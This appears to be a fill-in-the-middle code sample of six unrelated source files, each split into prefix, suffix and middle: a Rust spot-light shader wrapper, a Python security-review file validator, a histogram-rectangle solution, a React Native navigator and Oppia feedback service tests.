return http1.Serve(debugListener, http1.DefaultServeMux)
}, func(error) {
debugListener.Close()
})
} |
spot.rs | use crate::renderer::framework::{
error::FrameworkError,
gpu_program::{GpuProgram, UniformLocation},
state::PipelineState,
};
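/// Cached uniform locations for the deferred spot-light shader, resolved once
/// at construction time. Each name passed to `uniform_location` in `new` must
/// match a uniform declared in the included GLSL sources.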
pub struct | {
pub program: GpuProgram,
pub wvp_matrix: UniformLocation,
pub depth_sampler: UniformLocation,
pub color_sampler: UniformLocation,
pub normal_sampler: UniformLocation,
pub spot_shadow_texture: UniformLocation,
pub cookie_enabled: UniformLocation,
pub cookie_texture: UniformLocation,
pub light_view_proj_matrix: UniformLocation,
pub shadows_enabled: UniformLocation,
pub soft_shadows: UniformLocation,
pub shadow_map_inv_size: UniformLocation,
pub light_position: UniformLocation,
pub light_radius: UniformLocation,
pub light_color: UniformLocation,
pub light_direction: UniformLocation,
pub half_hotspot_cone_angle_cos: UniformLocation,
pub half_cone_angle_cos: UniformLocation,
pub inv_view_proj_matrix: UniformLocation,
pub camera_position: UniformLocation,
pub shadow_bias: UniformLocation,
pub light_intensity: UniformLocation,
}
impl SpotLightShader {
pub fn new(state: &mut PipelineState) -> Result<Self, FrameworkError> {
let fragment_source = include_str!("../shaders/deferred_spot_light_fs.glsl");
let vertex_source = include_str!("../shaders/deferred_light_vs.glsl");
let program =
GpuProgram::from_source(state, "DeferredLightShader", vertex_source, fragment_source)?;
Ok(Self {
wvp_matrix: program.uniform_location(state, "worldViewProjection")?,
depth_sampler: program.uniform_location(state, "depthTexture")?,
color_sampler: program.uniform_location(state, "colorTexture")?,
normal_sampler: program.uniform_location(state, "normalTexture")?,
spot_shadow_texture: program.uniform_location(state, "spotShadowTexture")?,
cookie_enabled: program.uniform_location(state, "cookieEnabled")?,
cookie_texture: program.uniform_location(state, "cookieTexture")?,
light_view_proj_matrix: program.uniform_location(state, "lightViewProjMatrix")?,
shadows_enabled: program.uniform_location(state, "shadowsEnabled")?,
soft_shadows: program.uniform_location(state, "softShadows")?,
shadow_map_inv_size: program.uniform_location(state, "shadowMapInvSize")?,
light_position: program.uniform_location(state, "lightPos")?,
light_radius: program.uniform_location(state, "lightRadius")?,
light_color: program.uniform_location(state, "lightColor")?,
light_direction: program.uniform_location(state, "lightDirection")?,
half_hotspot_cone_angle_cos: program
.uniform_location(state, "halfHotspotConeAngleCos")?,
half_cone_angle_cos: program.uniform_location(state, "halfConeAngleCos")?,
inv_view_proj_matrix: program.uniform_location(state, "invViewProj")?,
camera_position: program.uniform_location(state, "cameraPosition")?,
shadow_bias: program.uniform_location(state, "shadowBias")?,
light_intensity: program.uniform_location(state, "lightIntensity")?,
program,
})
}
}
| SpotLightShader |
validate.py | #!/usr/bin/env python
import sys
from typing import List
import os
import re
from better_profanity import profanity
class SecurityReviewValidator:
|
if __name__ == '__main__':
validator = SecurityReviewValidator()
    if len(sys.argv) == 2:
        path = sys.argv[1]
        if os.path.isdir(path):
            results = validator.validate_path(path)
        else:
            results = validator.validate_file(path)
else:
results = validator.validate_path('reviews')
if results:
for result in results:
print(f'Error: {result}')
sys.exit(1)
else:
print("OK")
sys.exit(0)
| results = None
def __init__(self):
pass
def validate_path(self, path: str) -> List[str]:
results = []
for root, _, files in os.walk(path, topdown=False):
for name in files:
filename = os.path.join(root, name)
for result in self.validate_file(filename):
results.append(f"{filename}: {result}")
return results
def validate_file(self, filename: str) -> List[str]:
self.results = []
if not os.path.isfile(filename):
self.results.append('File does not exist.')
return self.results
with open(filename, 'r') as f:
if not f.readable():
self.results.append('Unable to read from file.')
return self.results
content = f.read()
lines = content.splitlines()
self.__check_profanity(content)
self.__check_required_headers(lines)
self.__check_metadata(lines)
return self.results
def __check_profanity(self, content):
if profanity.contains_profanity(content):
self.results.append("Contains profanity.")
return
def __check_required_headers(self, lines):
sections = list(map(str.strip, filter(lambda s: s.startswith('### '), lines)))
for header in ['Metadata', 'Summary', 'Details',
'External References', 'Methodology']:
if f'### {header}' not in sections:
self.results.append(f'Missing header: {header}')
def __check_metadata(self, lines):
metadata_content = []
in_metadata = False
for line in lines:
line = line.strip()
if line == '### Metadata':
in_metadata = True
elif line.startswith('### Summary'):
in_metadata = False
break
elif in_metadata:
metadata_content.append(line)
metadata = {}
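        # Metadata lines are expected to look like "key: value"; values for a
        # repeated key accumulate into a list under the lower-cased key name.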
for line in metadata_content:
match = re.match(r'^([^:]+):\s*(.+)$', line)
if match:
key = match.group(1).strip().lower()
value = match.group(2).strip()
if key not in metadata:
metadata[key] = []
metadata[key].append(value)
if 'package_url' not in metadata:
self.results.append("Missing Package URL.")
if 'author' not in metadata:
self.results.append("Missing author.")
if 'review_date' not in metadata:
self.results.append("Missing review date.")
        if 'recommendation' not in metadata:
            self.results.append("Missing recommendation.")
        else:
            recommendations = metadata['recommendation']
            if len(recommendations) > 1:
                self.results.append(
                    "Too many recommendations, only one is allowed.")
            recommendation = recommendations[0]
            if recommendation not in [
                    'safe', 'unsafe', 'context-dependent', 'no-opinion']:
                self.results.append(
                    "Invalid recommendation, must be either 'safe', 'unsafe', "
                    "'context-dependent', or 'no-opinion'.")
main.rs | struct Solution {}
impl Solution {
pub fn largest_rectangle_area(mut heights: Vec<i32>) -> i32 {
// solution 1
// let mut max_area = 0;
//
// for i in 0..heights.len() {
// let mut min_height = i32::max_value();
//
// for j in i..heights.len() {
// min_height = min_height.min(heights[j]);
// max_area = max_area.max(min_height * (j - i + 1) as i32);
// }
// }
//
// max_area
// solution 2
let mut stack = vec![];
let mut fixed_heights = vec![0];
let mut max_area = 0;
        // fixed_heights = [0] + heights + [0]
        // The first 0 is an index guard; the last 0 triggers the final
        // calculation when the remaining bars are monotonically increasing.
fixed_heights.append(&mut heights);
fixed_heights.push(0);
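        // `stack` holds indices into `fixed_heights` whose heights are
        // non-decreasing. When the current bar is shorter than the bar at the
        // top of the stack, each popped bar's widest rectangle is bounded by
        // `i` on the right and by the new stack top on the left.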
for i in 0..fixed_heights.len() {
while !stack.is_empty() && fixed_heights[stack[stack.len() - 1]] > fixed_heights[i] {
let last = stack.pop().unwrap();
let width = (i - stack[stack.len() - 1] - 1) as i32;
max_area = max_area.max(width * fixed_heights[last]);
}
stack.push(i);
} |
max_area
}
}
fn main() {
assert_eq!(10, Solution::largest_rectangle_area(vec![2, 1, 5, 6, 2, 3, 4, 1, 2]));
assert_eq!(1, Solution::largest_rectangle_area(vec![1]));
assert_eq!(0, Solution::largest_rectangle_area(vec![]));
} | |
app.routes.tsx | import React from 'react';
import { createStackNavigator } from '@react-navigation/stack';
import { theme } from '../global/styles/theme';
import { Home } from '../screens/Home';
import { AppointmentDetails } from '../screens/AppointmentDetails';
import { AppointmentCreate } from '../screens/AppointmentCreate';
const { Navigator, Screen } = createStackNavigator();
export function | () {
return (
<Navigator
headerMode="none"
screenOptions={{
cardStyle: {
backgroundColor: theme.colors.secondary100
}
}}
>
<Screen
name="Home"
component={Home}
/>
<Screen
name="AppointmentDetails"
component={AppointmentDetails}
/>
<Screen
name="AppointmentCreate"
component={AppointmentCreate}
/>
</Navigator>
);
} | AppRoutes |
feedback_services_test.py | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for feedback-related services."""
import json
from core.domain import email_services
from core.domain import event_services
from core.domain import feedback_domain
from core.domain import feedback_jobs_continuous
from core.domain import feedback_services
from core.domain import subscription_services
from core.domain import user_services
from core.platform import models
from core.tests import test_utils
import feconf
(feedback_models, email_models) = models.Registry.import_models([
models.NAMES.feedback, models.NAMES.email])
taskqueue_services = models.Registry.import_taskqueue_services()
class FeedbackServicesUnitTests(test_utils.GenericTestBase):
"""Test functions in feedback_services."""
def test_feedback_ids(self):
"""Test various conventions for thread and message ids."""
exp_id = '0'
feedback_services.create_thread(
'exploration', exp_id, None, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', exp_id, False)
self.assertEqual(len(threadlist), 1)
thread_id = threadlist[0].id
messages = feedback_services.get_messages(thread_id)
self.assertEqual(len(messages), 1)
message_id = messages[0].message_id
self.assertTrue(isinstance(message_id, int))
# Retrieve the message instance from the storage layer.
datastore_id = feedback_models.GeneralFeedbackMessageModel.get_messages(
thread_id)[0].id
# The message id should be prefixed with the thread id and a full
# stop, followed by the message id.
self.assertEqual(datastore_id, '%s.%s' % (thread_id, message_id))
def test_create_message_fails_if_invalid_thread_id(self):
with self.assertRaises(
feedback_models.GeneralFeedbackMessageModel.EntityNotFoundError
):
feedback_services.create_message(
'invalid_thread_id', 'user_id', None, None, 'Hello')
def test_status_of_newly_created_thread_is_open(self):
exp_id = '0'
feedback_services.create_thread(
'exploration', exp_id, None, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', exp_id, False)
thread_status = threadlist[0].status
self.assertEqual(thread_status, feedback_models.STATUS_CHOICES_OPEN)
def test_get_exp_id_from_thread_id(self):
thread_id = 'exploration.exp1.1234'
self.assertEqual(
feedback_services.get_exp_id_from_thread_id(thread_id), 'exp1')
class MockFeedbackAnalyticsAggregator(
feedback_jobs_continuous.FeedbackAnalyticsAggregator):
"""A modified FeedbackAnalyticsAggregator that does not start a new batch
job when the previous one has finished.
"""
@classmethod
def _get_batch_job_manager_class(cls):
return MockFeedbackAnalyticsMRJobManager
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
pass
class MockFeedbackAnalyticsMRJobManager(
feedback_jobs_continuous.FeedbackAnalyticsMRJobManager):
@classmethod
def _get_continuous_computation_class(cls):
return MockFeedbackAnalyticsAggregator
class FeedbackThreadUnitTests(test_utils.GenericTestBase):
EXP_ID_1 = 'eid1'
EXP_ID_2 = 'eid2'
EXP_ID_3 = 'eid3'
THREAD_ID = 'thread_id'
EXPECTED_THREAD_DICT = {
'status': u'open',
'summary': None,
'original_author_username': None,
'subject': u'a subject'
}
EXPECTED_THREAD_DICT_VIEWER = {
'status': u'open',
'summary': None,
'original_author_username': None,
'subject': u'a subject second'
}
USER_EMAIL = '[email protected]'
USER_USERNAME = 'user'
def setUp(self):
super(FeedbackThreadUnitTests, self).setUp()
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.signup(self.USER_EMAIL, self.USER_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(self.USER_EMAIL)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
self.save_new_valid_exploration(
self.EXP_ID_1, self.owner_id, title='Bridges in England',
category='Architecture', language_code='en')
self.save_new_valid_exploration(
self.EXP_ID_2, self.owner_id, title='Sillat Suomi',
category='Architecture', language_code='fi')
self.save_new_valid_exploration(
self.EXP_ID_3, self.owner_id, title='Leaning tower of Pisa',
category='Architecture', language_code='fi')
def _get_all_messages_read(self, user_id, thread_id):
feedback_thread_user_model = (
feedback_models.GeneralFeedbackThreadUserModel.get(
user_id, thread_id))
return (
feedback_thread_user_model.message_ids_read_by_user if
feedback_thread_user_model else [])
def _run_computation(self):
MockFeedbackAnalyticsAggregator.start_computation()
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_CONTINUOUS_JOBS), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_CONTINUOUS_JOBS), 0)
self.process_and_flush_pending_tasks()
def test_get_threads_single_exploration(self):
threads = feedback_services.get_threads('exploration', self.EXP_ID_1)
self.assertEqual(len(threads), 0)
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_threads('exploration', self.EXP_ID_1)
self.assertEqual(1, len(threads))
self.assertDictContainsSubset(
self.EXPECTED_THREAD_DICT, threads[0].to_dict())
def test_get_all_threads(self):
# Create an anonymous feedback thread.
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads))
self.assertDictContainsSubset(
self.EXPECTED_THREAD_DICT, threads[0].to_dict())
self.EXPECTED_THREAD_DICT_VIEWER['original_author_username'] = (
self.VIEWER_USERNAME)
# Viewer creates feedback thread.
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.viewer_id,
self.EXPECTED_THREAD_DICT_VIEWER['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(2, len(threads))
self.assertDictContainsSubset(
self.EXPECTED_THREAD_DICT_VIEWER, threads[0].to_dict())
def test_get_total_open_threads_before_job_run(self):
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi([self.EXP_ID_1])), 0)
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads))
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi(
[self.EXP_ID_1])), 0)
def test_get_total_open_threads_for_single_exploration(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads))
self._run_computation()
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi(
[self.EXP_ID_1])), 1)
def test_get_total_open_threads_for_multiple_explorations(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
feedback_services.create_thread(
'exploration', self.EXP_ID_2, None,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads_exp_1 = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
self.assertEqual(1, len(threads_exp_1))
threads_exp_2 = feedback_services.get_all_threads(
'exploration', self.EXP_ID_2, False)
self.assertEqual(1, len(threads_exp_2))
def _close_thread(thread_id):
thread = feedback_models.GeneralFeedbackThreadModel.get_by_id(
thread_id)
thread.status = feedback_models.STATUS_CHOICES_FIXED
thread.put()
_close_thread(threads_exp_1[0].id)
self.assertEqual(len(feedback_services.get_closed_threads(
'exploration', self.EXP_ID_1, False)), 1)
self._run_computation()
self.assertEqual(feedback_services.get_total_open_threads(
feedback_services.get_thread_analytics_multi(
[self.EXP_ID_1, self.EXP_ID_2])), 1)
def test_get_thread_summaries(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.user_id,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
feedback_services.create_thread(
'exploration', self.EXP_ID_2, self.user_id,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
# The message count parameter is missing for this thread. The thread
# summaries function should account for this and function
# flawlessly.
thread_3 = feedback_models.GeneralFeedbackThreadModel(
id='exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID,
entity_type='exploration', entity_id=self.EXP_ID_3,
original_author_id=self.user_id, subject='Feedback',
status=feedback_models.STATUS_CHOICES_OPEN, has_suggestion=False)
thread_3.put()
feedback_services.create_message(
'exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID,
self.user_id, None, None, 'not used here')
thread_ids = subscription_services.get_all_threads_subscribed_to(
self.user_id)
thread_ids.append('exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID)
thread_summaries, number_of_unread_threads = (
feedback_services.get_thread_summaries(
self.user_id, thread_ids))
exploration_titles = (
['Bridges in England', 'Sillat Suomi', 'Leaning tower of Pisa'])
# Fetch the threads.
threads = []
threads.append(feedback_services.get_thread(thread_ids[0]))
threads.append(feedback_services.get_thread(thread_ids[1]))
threads.append(feedback_services.get_thread(
'exploration.' + self.EXP_ID_3 + '.' + self.THREAD_ID))
# Check if the number of unread messages match.
self.assertEqual(number_of_unread_threads, 0)
for index, thread in enumerate(threads):
thread_summary = {
'status': thread.status,
'original_author_id': thread.original_author_id,
'last_updated': thread_summaries[index]['last_updated'],
'last_message_text': 'not used here',
'total_message_count': 1,
'last_message_read': True,
'second_last_message_read': None,
'author_last_message': user_services.get_username(
self.user_id),
'author_second_last_message': None,
'exploration_title': exploration_titles[index]
}
# Check if the summaries match.
self.assertDictContainsSubset(
thread_summary, thread_summaries[index])
feedback_services.create_message(
threads[0].id, self.owner_id, None, None, 'editor message')
_, number_of_unread_threads = (
feedback_services.get_thread_summaries(self.user_id, thread_ids))
# Check if the number of unread messages is equal to 1.
self.assertEqual(number_of_unread_threads, 1)
def test_update_messages_read_by_the_user(self):
feedback_services.create_thread(
'exploration', self.EXP_ID_1, self.user_id,
self.EXPECTED_THREAD_DICT['subject'], 'not used here')
threads = feedback_services.get_all_threads(
'exploration', self.EXP_ID_1, False)
thread_id = threads[0].id
messages = feedback_services.get_messages(thread_id)
message_ids = [message.message_id for message in messages]
        # The viewer has not read any messages yet.
self.assertEqual(self._get_all_messages_read(
self.viewer_id, thread_id), [])
feedback_services.update_messages_read_by_the_user(
self.viewer_id, thread_id, message_ids)
# Check if the message is added to the read section of the viewer.
self.assertEqual(self._get_all_messages_read(
self.viewer_id, thread_id), message_ids)
def test_only_exploration_threads_trigger_events(self):
exp_id = 'eid'
self.save_new_valid_exploration(exp_id, 'owner')
event_handler_call_counter_exploration = test_utils.CallCounter(
event_services.FeedbackThreadCreatedEventHandler.record)
with self.swap(
event_services.FeedbackThreadCreatedEventHandler, 'record',
event_handler_call_counter_exploration):
feedback_services.create_thread(
feconf.ENTITY_TYPE_EXPLORATION, exp_id,
None, 'a subject', 'some text')
self.assertEqual(
event_handler_call_counter_exploration.times_called, 1)
event_handler_call_counter_non_exploration = (
test_utils.CallCounter(
event_services.FeedbackThreadCreatedEventHandler.record))
with self.swap(
event_services.FeedbackThreadCreatedEventHandler, 'record',
event_handler_call_counter_non_exploration):
feedback_services.create_thread(
'topic', 'topic_id', None, 'a subject',
'some text')
self.assertEqual(
event_handler_call_counter_non_exploration.times_called, 0)
class | (test_utils.GenericTestBase):
"""Tests for tasks in emails taskqueue."""
def test_create_new_batch_task(self):
user_id = 'user'
feedback_services.enqueue_feedback_message_batch_email_task(user_id)
self.assertEqual(
self.count_jobs_in_taskqueue(taskqueue_services.QUEUE_NAME_EMAILS),
1)
tasks = self.get_pending_tasks(
queue_name=taskqueue_services.QUEUE_NAME_EMAILS)
self.assertEqual(
tasks[0].url, feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS)
def test_create_new_instant_task(self):
user_id = 'user'
reference_dict = {
'entity_type': 'exploration',
'entity_id': 'eid',
'thread_id': 'tid',
'message_id': 'mid'
}
reference = feedback_domain.FeedbackMessageReference(
reference_dict['entity_type'], reference_dict['entity_id'],
reference_dict['thread_id'], reference_dict['message_id'])
feedback_services.enqueue_feedback_message_instant_email_task(
user_id, reference)
self.assertEqual(
self.count_jobs_in_taskqueue(taskqueue_services.QUEUE_NAME_EMAILS),
1)
tasks = self.get_pending_tasks(
queue_name=taskqueue_services.QUEUE_NAME_EMAILS)
payload = json.loads(tasks[0].payload)
self.assertEqual(
tasks[0].url, feconf.TASK_URL_INSTANT_FEEDBACK_EMAILS)
self.assertDictEqual(payload['reference_dict'], reference_dict)
class FeedbackMessageEmailTests(test_utils.GenericTestBase):
"""Tests for feedback message emails."""
def setUp(self):
super(FeedbackMessageEmailTests, self).setUp()
self.signup('[email protected]', 'A')
self.user_id_a = self.get_user_id_from_email('[email protected]')
self.signup('[email protected]', 'B')
self.user_id_b = self.get_user_id_from_email('[email protected]')
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.exploration = self.save_new_default_exploration(
'A', self.editor_id, title='Title')
self.can_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', True)
self.can_send_feedback_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', True)
def test_send_feedback_message_email(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 1)
expected_feedback_message_dict = {
'entity_type': 'exploration',
'entity_id': self.exploration.id,
'thread_id': thread_id,
'message_id': messagelist[0].message_id
}
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
model = feedback_models.UnsentFeedbackEmailModel.get(self.editor_id)
self.assertEqual(len(model.feedback_message_references), 1)
self.assertDictEqual(
model.feedback_message_references[0],
expected_feedback_message_dict)
self.assertEqual(model.retries, 0)
def test_add_new_feedback_message(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.user_id_a, None, None, 'editor message')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
messagelist = feedback_services.get_messages(thread_id)
self.assertEqual(len(messagelist), 2)
expected_feedback_message_dict1 = {
'entity_type': 'exploration',
'entity_id': self.exploration.id,
'thread_id': thread_id,
'message_id': messagelist[0].message_id
}
expected_feedback_message_dict2 = {
'entity_type': 'exploration',
'entity_id': self.exploration.id,
'thread_id': thread_id,
'message_id': messagelist[1].message_id
}
model = feedback_models.UnsentFeedbackEmailModel.get(self.editor_id)
self.assertEqual(len(model.feedback_message_references), 2)
self.assertDictEqual(
model.feedback_message_references[0],
expected_feedback_message_dict1)
self.assertDictEqual(
model.feedback_message_references[1],
expected_feedback_message_dict2)
self.assertEqual(model.retries, 0)
def test_email_is_not_sent_recipient_has_muted_emails_globally(self):
user_services.update_email_preferences(
self.editor_id, True, False, False, False)
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_email_is_not_sent_recipient_has_muted_this_exploration(self):
user_services.set_email_preferences_for_exploration(
self.editor_id, self.exploration.id,
mute_feedback_notifications=True)
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_emails_are_not_sent_for_anonymous_user(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id, None,
'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_emails_are_sent_for_registered_user(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
tasks = self.get_pending_tasks(
queue_name=taskqueue_services.QUEUE_NAME_EMAILS)
self.assertEqual(
tasks[0].url, feconf.TASK_URL_FEEDBACK_MESSAGE_EMAILS)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 1)
def test_that_emails_are_not_sent_if_service_is_disabled(self):
cannot_send_emails_ctx = self.swap(
feconf, 'CAN_SEND_EMAILS', False)
cannot_send_feedback_message_email_ctx = self.swap(
feconf, 'CAN_SEND_FEEDBACK_MESSAGE_EMAILS', False)
with cannot_send_emails_ctx, cannot_send_feedback_message_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'some text')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_emails_are_not_sent_for_thread_status_changes(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', '')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_email_are_not_sent_to_author_himself(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.editor_id, 'a subject', 'A message')
# Note: the job in the taskqueue represents the realtime
# event emitted by create_thread().
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
messages = self.mail_stub.get_sent_messages(to=self.EDITOR_EMAIL)
self.assertEqual(len(messages), 0)
def test_that_email_is_sent_for_reply_on_feedback(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id, None, None, 'editor message')
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 0)
self.process_and_flush_pending_tasks()
def test_that_email_is_sent_for_changing_status_of_thread(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
feedback_services.create_message(
thread_id, self.editor_id,
feedback_models.STATUS_CHOICES_FIXED, None, '')
# There are two jobs in the taskqueue: one for the realtime
# event associated with changing subject of thread, and one for
# sending the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
def test_that_email_is_sent_for_each_feedback_message(self):
with self.can_send_emails_ctx, self.can_send_feedback_email_ctx:
feedback_services.create_thread(
'exploration', self.exploration.id,
self.user_id_a, 'a subject', 'A message')
threadlist = feedback_services.get_all_threads(
'exploration', self.exploration.id, False)
thread_id = threadlist[0].id
# There are two jobs in the taskqueue: one for the realtime
# event associated with creating a thread, and one for sending
# the email.
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EMAILS), 1)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_EVENTS), 1)
self.process_and_flush_pending_tasks()
